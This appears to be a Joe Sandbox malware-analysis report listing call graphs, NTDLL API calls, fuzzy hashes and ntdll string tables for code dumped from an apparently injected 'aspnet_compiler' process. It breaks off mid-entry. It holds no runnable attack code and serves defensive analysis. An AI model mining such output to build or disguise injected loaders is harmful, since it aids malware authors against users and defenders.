LdrLoadDll 76170->76171 76172 417afe 76170->76172 76171->76172 76173 413f73 76177 413f93 76173->76177 76175 413ff2 76176 413ffc 76177->76176 76178 41b723 NtClose RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 76177->76178 76178->76175 76179 401b39 76180 401b56 76179->76180 76183 4300d3 76180->76183 76186 42e733 76183->76186 76187 42e756 76186->76187 76196 407363 76187->76196 76189 42e76c 76195 401bb0 76189->76195 76199 41b413 76189->76199 76191 42e78b 76192 42e7a0 76191->76192 76193 42ce63 ExitProcess 76191->76193 76210 42ce63 76192->76210 76193->76192 76198 407370 76196->76198 76213 416783 76196->76213 76198->76189 76200 41b43f 76199->76200 76233 41b303 76200->76233 76203 41b484 76205 41b4a0 76203->76205 76208 42caa3 NtClose 76203->76208 76204 41b46c 76206 41b477 76204->76206 76207 42caa3 NtClose 76204->76207 76205->76191 76206->76191 76207->76206 76209 41b496 76208->76209 76209->76191 76211 42ce7d 76210->76211 76212 42ce8e ExitProcess 76211->76212 76212->76195 76214 4167a0 76213->76214 76216 4167b9 76214->76216 76217 42d503 76214->76217 76216->76198 76218 42d51d 76217->76218 76219 428a73 2 API calls 76218->76219 76221 42d543 76219->76221 76220 42d54c 76220->76216 76221->76220 76226 42c0d3 76221->76226 76224 42eb63 RtlFreeHeap 76225 42d5c5 76224->76225 76225->76216 76227 42c0ed 76226->76227 76230 10c2c0a 76227->76230 76228 42c119 76228->76224 76231 10c2c1f LdrInitializeThunk 76230->76231 76232 10c2c11 76230->76232 76231->76228 76232->76228 76234 41b3f9 76233->76234 76235 41b31d 76233->76235 76234->76203 76234->76204 76239 42c173 76235->76239 76238 42caa3 NtClose 76238->76234 76240 42c18d 76239->76240 76243 10c35c0 LdrInitializeThunk 76240->76243 76241 41b3ed 76241->76238 76243->76241 76130 10c2b60 LdrInitializeThunk

                                                    Control-flow Graph

                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B45
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1996937641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 3abb8934b2deea7cf8995457286ab451861941c44ec952a6381cefb48b324b06
                                                    • Instruction ID: 6958de0539ed87db045534c96cf9f30a3f666686e50994af113b284ce7070270
                                                    • Opcode Fuzzy Hash: 3abb8934b2deea7cf8995457286ab451861941c44ec952a6381cefb48b324b06
                                                    • Instruction Fuzzy Hash: 050171B1E0420DABDF10DBE5DC42FDEB7789B54308F4041AAE90997240F634EB48CB95

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 49 42caa3-42cadc call 404733 call 42dcf3 NtClose
                                                    APIs
                                                    • NtClose.NTDLL(00424DA4,?,00000000,?,?,00424DA4,?,0000A4D5), ref: 0042CAD7
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1996937641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 95984d51aba280b0eeba7de52bb90226bdf2f6e449d6942d434407c1fa256c8c
                                                    • Instruction ID: bab638a06a20cba49bdc37724a7ace9e2551abb6e6206052b0f1b05451a4d7e4
                                                    • Opcode Fuzzy Hash: 95984d51aba280b0eeba7de52bb90226bdf2f6e449d6942d434407c1fa256c8c
                                                    • Instruction Fuzzy Hash: 32E04F71200254BFD520EA5ADC41F9B775DDFC6724F01442AFA0867241CAB5B91187E4

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 66 10c35c0-10c35cc LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8bdaeff705f71d445b30d24f5dc28fc67201ec1f60ec565e044bad67abba9367
                                                    • Instruction ID: 510a34855ed59ad2da894fcede28a886b3038c54b0ce0beeaaf4a74f38f17945
                                                    • Opcode Fuzzy Hash: 8bdaeff705f71d445b30d24f5dc28fc67201ec1f60ec565e044bad67abba9367
                                                    • Instruction Fuzzy Hash: 7290023560561402E100715C8514706101597D0201F65C412E0824568DC7958A5166A3

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 63 10c2b60-10c2b6c LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 0407db5619d5312c5c233b2b704afbf0f8b64eac96f3f593c18a020a58bb2571
                                                    • Instruction ID: 9f5ff3559bc62bf12fa0474e16ba2f0976d70ae8b59dd015d69280f4fee66b9d
                                                    • Opcode Fuzzy Hash: 0407db5619d5312c5c233b2b704afbf0f8b64eac96f3f593c18a020a58bb2571
                                                    • Instruction Fuzzy Hash: 58900265202510035105715C8414616401A97E0201B55C022E1414590DC52589916226

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 65 10c2df0-10c2dfc LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8e288622a6aea29f3d608eaf8b4d3dcd39e93b8458da5c2b529bc854cb0998c1
                                                    • Instruction ID: acf2c8d1e2d96960b681eea5ca5cacdb14cebf6deb33b413c6205ea3aba0a92b
                                                    • Opcode Fuzzy Hash: 8e288622a6aea29f3d608eaf8b4d3dcd39e93b8458da5c2b529bc854cb0998c1
                                                    • Instruction Fuzzy Hash: CD90023520151413E111715C8504707001997D0241F95C413E0824558DD6568A52A222

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 64 10c2c70-10c2c7c LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 600358b4cd4593ba77800afe7d80ea72b7a045e83e3237ebfaa426247414913b
                                                    • Instruction ID: 740b2f1bc921d13924461fa47c7379b5b344ed7290895cd18083d1d339512281
                                                    • Opcode Fuzzy Hash: 600358b4cd4593ba77800afe7d80ea72b7a045e83e3237ebfaa426247414913b
                                                    • Instruction Fuzzy Hash: FB90023520159802E110715CC40474A001597D0301F59C412E4824658DC69589917222

                                                    Control-flow Graph

                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B45
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1996937641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 118cd8151f65cad536bfb90d463c3089610babbb6b4a85fbbb409a7547da50f0
                                                    • Instruction ID: 9eb2aaa38af0e5dcfb9d013a484bd9dcd25c236336862dc48f3d5ce07fbb034f
                                                    • Opcode Fuzzy Hash: 118cd8151f65cad536bfb90d463c3089610babbb6b4a85fbbb409a7547da50f0
                                                    • Instruction Fuzzy Hash: 18F0E971D4D24CA7CB20DAA49805ADDB774EF81218F0482DFEC8C5B182D7704A488B81

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 39 42cdc3-42ce07 call 404733 call 42dcf3 RtlAllocateHeap
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000104,?,00424DAF,?,?,00424DAF,?,00000104,?,0000A4D5), ref: 0042CE02
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1996937641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 18ed35692f320a06c02e01862fbef1a92ffaf39f1c261eae4e2ba405e988b0a3
                                                    • Instruction ID: 5228f9f31e87c64cdc2fe6c57c997e13c34e11227758095d69eb6327102ed8e8
                                                    • Opcode Fuzzy Hash: 18ed35692f320a06c02e01862fbef1a92ffaf39f1c261eae4e2ba405e988b0a3
                                                    • Instruction Fuzzy Hash: 0EE06D72600214BBD614EE5ADC41E9B77ACEFC9710F404019F908A7242CAB5B910CBB8

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 44 42ce13-42ce54 call 404733 call 42dcf3 RtlFreeHeap
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8F1BBCDC,00000007,00000000,00000004,00000000,0041734F,000000F4), ref: 0042CE4F
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1996937641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: 56e7a3f0196c4152ba34c0ffd221ac8e3e563bd15ad111ddd9bb9e652d80656c
                                                    • Instruction ID: 8fb5ce4790ea6ab73b6841f41c7e8dec98879e0efbfbdf9127808135dc497725
                                                    • Opcode Fuzzy Hash: 56e7a3f0196c4152ba34c0ffd221ac8e3e563bd15ad111ddd9bb9e652d80656c
                                                    • Instruction Fuzzy Hash: BDE06DB16046147BD614EE59DC45FDB33ADEFC9714F004419FE08AB241D774B9108BB9

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 54 42ce63-42ce9c call 404733 call 42dcf3 ExitProcess
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1996937641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: 09eeadd3d2fad5bbef70f1e0aaf87e062e704158e1647d02c88732a8ebbeb8cb
                                                    • Instruction ID: 1e822c6f64663e1bca1ff19fe02a13ed9a82d52fc4e167faab22f241629e33d6
                                                    • Opcode Fuzzy Hash: 09eeadd3d2fad5bbef70f1e0aaf87e062e704158e1647d02c88732a8ebbeb8cb
                                                    • Instruction Fuzzy Hash: C6E04F716402147BC520AA5ADC41FDB775DDFC6714F40802AFA0967141C6B5B9018BF5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 59 10c2c0a-10c2c0f 60 10c2c1f-10c2c26 LdrInitializeThunk 59->60 61 10c2c11-10c2c18 59->61
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 80ae76f0435d3946796b2fa286f217d9b0c9ca3112f64b5d358d6c665a3ad3f8
                                                    • Instruction ID: ae3ab1fd66be5613d839faeca7cf93f8b18163841a34fc5aa7a8d6639754f940
                                                    • Opcode Fuzzy Hash: 80ae76f0435d3946796b2fa286f217d9b0c9ca3112f64b5d358d6c665a3ad3f8
                                                    • Instruction Fuzzy Hash: 39B09B719015D5C5EA51E764860871F795077D0701F15C066D2430681F4738C1D1E676
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-2160512332
                                                    • Opcode ID: 17df6db8d0fe3216280e819ce5e96fc152c37532b864cb1495cae378475d0124
                                                    • Instruction ID: c77e0dfccfafb32eb9b63c236c0e26d5960a31b87dd57a11026ca82eafeca47e
                                                    • Opcode Fuzzy Hash: 17df6db8d0fe3216280e819ce5e96fc152c37532b864cb1495cae378475d0124
                                                    • Instruction Fuzzy Hash: A5929371A047429FE72ADF14C884FABB7E8BB84754F04492DFA95D7290D7B0D844CB92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                    • API String ID: 0-3591852110
                                                    • Opcode ID: 3b1c99970eccbd3e340412f90f35741df8a3a71f5776e86853c43934950aa364
                                                    • Instruction ID: ca47a43c57d0e1f9fa254234c834312594b885e78495fbd3c3e5b94a96a60456
                                                    • Opcode Fuzzy Hash: 3b1c99970eccbd3e340412f90f35741df8a3a71f5776e86853c43934950aa364
                                                    • Instruction Fuzzy Hash: DA12DE30604642EFEB2ACF69C440BB6BBF1FF8A714F198459E4D68B685D734E881CB51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                    • API String ID: 0-3532704233
                                                    • Opcode ID: c7ae6feefe0ffb81d6ee0e3e5ad90c1ef2cdfef574cd041e60e79002ad660cc0
                                                    • Instruction ID: 139e671b1fcb39c63a8208c36cbc07897b8779afa3cc7ea0d7b7b8e3ca863957
                                                    • Opcode Fuzzy Hash: c7ae6feefe0ffb81d6ee0e3e5ad90c1ef2cdfef574cd041e60e79002ad660cc0
                                                    • Instruction Fuzzy Hash: 42B1AC729083429FD761DF68C880AAFBBE8BF88754F05496EF9C9D7240D730D9448B96
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                    • API String ID: 0-3063724069
                                                    • Opcode ID: 3449ab32ad6ebdc53deacb4733a99e0c9a6fa16f8bc585d6fa25abae24be84eb
                                                    • Instruction ID: 2654e376ef2847bf3725773346084e4a03390b5fb8999959d12221051cd300f4
                                                    • Opcode Fuzzy Hash: 3449ab32ad6ebdc53deacb4733a99e0c9a6fa16f8bc585d6fa25abae24be84eb
                                                    • Instruction Fuzzy Hash: 9BD1E5B280831AAFD725DB54C850BAFFBE8AF94B18F44493DFA9497150D770D904CBA2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                    • API String ID: 0-1700792311
                                                    • Opcode ID: 426673d73ff164796f010bbbf9cd45749e94c55794032508f11b24c8e2d93e65
                                                    • Instruction ID: 494d5db2ffc24d4e2d7a81991c1df92dd9c0bb7714e893555f7f091897574f1f
                                                    • Opcode Fuzzy Hash: 426673d73ff164796f010bbbf9cd45749e94c55794032508f11b24c8e2d93e65
                                                    • Instruction Fuzzy Hash: 6ED1EF31A00686DFDB2ADF68C840AAEFBF1FF8A710F198059F4959B656C7349981CB14
                                                    Strings
                                                    • Control Panel\Desktop\LanguageConfiguration, xrefs: 0107D196
                                                    • @, xrefs: 0107D0FD
                                                    • @, xrefs: 0107D313
                                                    • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0107D146
                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0107D2C3
                                                    • @, xrefs: 0107D2AF
                                                    • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0107D0CF
                                                    • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0107D262
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                    • API String ID: 0-1356375266
                                                    • Opcode ID: 9bdd56a4011f399138fa0119dc5f27fddd45e28024f0d581cd184d9a1b4ec23c
                                                    • Instruction ID: c634f93b3012dba8855e935baebdb94b57d613d98c873a1730546ead05ddea8c
                                                    • Opcode Fuzzy Hash: 9bdd56a4011f399138fa0119dc5f27fddd45e28024f0d581cd184d9a1b4ec23c
                                                    • Instruction Fuzzy Hash: 1CA158719083469FE761DF64C880B9FBBE8BF84725F00492EEAC896240E774D949CF56
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-523794902
                                                    • Opcode ID: 25d3b6432f8f124ce1c082b48f4da78d87ee24b7fbb29150498da008a53905f8
                                                    • Instruction ID: 6b72d90c103e135ee82cc14297402e2dd4add947f65432e816a03c70243e4ca2
                                                    • Opcode Fuzzy Hash: 25d3b6432f8f124ce1c082b48f4da78d87ee24b7fbb29150498da008a53905f8
                                                    • Instruction Fuzzy Hash: B6420F31A04382DFD755DF28C884A6ABBE5FF88604F0849ADF5E58B351DB34D841CB56
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                    • API String ID: 0-122214566
                                                    • Opcode ID: 28664305b8bce75dc2bb4f46f879fcefd108074ac1608f4a657d18d3765129df
                                                    • Instruction ID: 3e3708e1cab109de6710e8b1997f50b5eeefe69135fc222f03079482926fdc66
                                                    • Opcode Fuzzy Hash: 28664305b8bce75dc2bb4f46f879fcefd108074ac1608f4a657d18d3765129df
                                                    • Instruction Fuzzy Hash: 72C14A71A00215ABDF25CF69D8A4FBEBBE5EF45720F04C0A9EDC19B291DB708844E391
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-792281065
                                                    • Opcode ID: 18c8afd99b66da78cf2f6ae515f63706ff27f782dbb93bec4c67e1d16df85dcf
                                                    • Instruction ID: feb53cec4fa3473b9beca9dadda0cf3fdb00662887f157bc39afcd49c63d61ef
                                                    • Opcode Fuzzy Hash: 18c8afd99b66da78cf2f6ae515f63706ff27f782dbb93bec4c67e1d16df85dcf
                                                    • Instruction Fuzzy Hash: 77912830A017159BEB69DF18D885BEE7BB5BF40B14F04017CEA90AB781DB799841CB91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                    • API String ID: 0-1745908468
                                                    • Opcode ID: 8dc7022edcd4a23d37ad02c0da3d284fe3302bb9e4b1564adae6c0e6368bb2e8
                                                    • Instruction ID: 0954fb57674ad1cc531f63fe4308ca19e424f0d7f276b08dd87d067e14ee7a2a
                                                    • Opcode Fuzzy Hash: 8dc7022edcd4a23d37ad02c0da3d284fe3302bb9e4b1564adae6c0e6368bb2e8
                                                    • Instruction Fuzzy Hash: 44912131A00662DFDB2ADFA8D440AADFBF2FF19704F15801DE495AB361CB759852CB14
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 010D9A11, 010D9A3A
                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 010D9A2A
                                                    • LdrpInitShimEngine, xrefs: 010D99F4, 010D9A07, 010D9A30
                                                    • apphelp.dll, xrefs: 01076496
                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 010D9A01
                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010D99ED
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-204845295
                                                    • Opcode ID: 88f183e37b51d0bc30b37711181714b6b4dec3dc66bdcba323df5065a2a3b0fc
                                                    • Instruction ID: 23270b7a567e93ae0e984c4b7beaff2064026ab67ca7a64a1550692b627b8d19
                                                    • Opcode Fuzzy Hash: 88f183e37b51d0bc30b37711181714b6b4dec3dc66bdcba323df5065a2a3b0fc
                                                    • Instruction Fuzzy Hash: FD51C0716187059FE724DF28C881AABB7E8FB84748F00092DF5D69B260D731E944DB97
                                                    Strings
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010F02E7
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010F02BD
                                                    • RTL: Re-Waiting, xrefs: 010F031E
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                    • API String ID: 0-2474120054
                                                    • Opcode ID: 43d919c549a71b25129a90c407b0240854fead309e5d47d116462c5c4346a12d
                                                    • Instruction ID: dca3e31ebd55f8a39e541d04e3598202a79e495d0c1237423bda084d407f6697
                                                    • Opcode Fuzzy Hash: 43d919c549a71b25129a90c407b0240854fead309e5d47d116462c5c4346a12d
                                                    • Instruction Fuzzy Hash: 22E1FF306087429FE765CF68C881B6EBBE1BB88314F144A6DF6E58B6D2D774D844CB42
                                                    Strings
                                                    • Kernel-MUI-Language-Allowed, xrefs: 010A527B
                                                    • WindowsExcludedProcs, xrefs: 010A522A
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 010A5352
                                                    • Kernel-MUI-Language-SKU, xrefs: 010A542B
                                                    • Kernel-MUI-Number-Allowed, xrefs: 010A5247
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 0-258546922
                                                    • Opcode ID: b473890219a25717a8d75a816af651b33c06cfe446371ceb47ff54761adfadac
                                                    • Instruction ID: e30ac4006a5c523141694620d0257106e9dbc6591d3257529e3a8fc237411175
                                                    • Opcode Fuzzy Hash: b473890219a25717a8d75a816af651b33c06cfe446371ceb47ff54761adfadac
                                                    • Instruction Fuzzy Hash: AEF14A72D00619EFCB11DFA9C984AEEBBF9FF48610F50406AE585EB210E7709E008B90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
